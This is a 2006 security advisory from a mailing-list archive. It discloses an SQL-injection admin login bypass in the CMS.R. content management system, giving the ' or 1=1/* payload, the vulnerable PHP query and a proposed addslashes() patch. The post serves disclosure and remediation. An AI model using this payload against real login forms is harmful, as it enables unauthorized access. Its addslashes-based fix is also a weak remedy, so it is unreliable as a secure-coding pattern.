CMS.R. the Content Management System admin authentication baypass Sep 11 2006 03:38PM
security soqor net
Hello

Title : CMS.R. the Content Management System admin authentication baypass

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net [email concealed]

The Vulnerability works 100% with magic_quotes_gpc = off

put the user name value (' or 1=1/*)

[code]

' or 1=1/*

[/code]

and you will login :)

error file : index.php

line : 48

query :-

[code]

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";

[/code]

solution:-

replace

[code]

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";

[/code]

with

[code]

//

// Fixed By : HACKERS PAL

// WwW.SoQoR.NeT

//

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".addslashes($_POST['adminname'])."' AND BINARY pass='".addslashes($_POST['adminpass'])."'";

[/code]

WwW.SoQoR.NeT

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus